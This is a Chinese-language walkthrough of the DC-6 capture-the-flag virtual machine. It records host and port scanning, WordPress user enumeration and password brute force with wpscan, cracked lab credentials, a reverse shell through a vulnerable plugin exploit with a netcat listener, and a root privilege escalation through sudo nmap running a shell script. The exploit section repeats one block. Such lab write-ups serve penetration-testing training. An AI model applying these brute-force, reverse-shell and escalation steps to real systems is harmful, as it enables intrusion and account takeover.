靶机-DC6

arp-scan查靶机IP

masscan查端口

nmap深度扫描

端口：22，80

dirb目录扫描

访问主页，发现需要域名解析

指纹

http://192.168.253.136/wp-includes/里面是wp配置文件

http://192.168.253.136/wp-admin/css/

http://192.168.253.136/wp-admin/images/

http://192.168.253.136/wp-admin/includes/

http://192.168.253.136/wp-admin/maint/

指定url，枚举其中的用户名

wpscan --url wordy -e user.txt 将枚举出的用户名写到user.txt中

官方给了一个线索：cat /usr/share/wordlists/rockyou.txt | grep k01 > pwd.txt

wpscan --url http://wordy/ -e u #用户枚举

admin,graham,mark,sarah,jens

用户名和密码字典都有了，开始爆破
wpscan --url wordy -U user.txt -P pwd.txt

爆破出来账号：mark 密码：helpdesk01

发现存在RCE

nc反弹

在mark目录找到密码 user: graham - GSo7isUM1D4 - done

ssh登录

可以看到jens用户目录下面有一个可执行文件
切换到jens用户目录，查看backups.sh的内容

修改脚本，在末尾增加/bin/bash

使用jens用户运行脚本切换到jens用户

使用sudo -l查看jens用户可执行操作

jens用户可以在无需输入密码的情况下使用nmap(root权限)
直接上提权网站查询nmap sudo提权的方法

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

获得root权限，回到root路径下找到flag

---

发现存在一个插件Activity monitor，使用kali搜索这个插件是否存在漏洞

尝试45274.html这个漏洞利用文件

searchsploit -m 45274.html
vim 45274.html
#在箭头1修改为域名地址
#箭头2修改为kali反弹shell命令

#kali监听shell
nc -lnvp 4443

searchsploit -m 45274.html
vim 45274.html
#在箭头1修改为域名地址
#箭头2修改为kali反弹shell命令

#kali监听shell
nc -lnvp 4443

#反弹shell成功，转换交互式shell python -c ‘import pty;pty.spawn(“/bin/bash”)’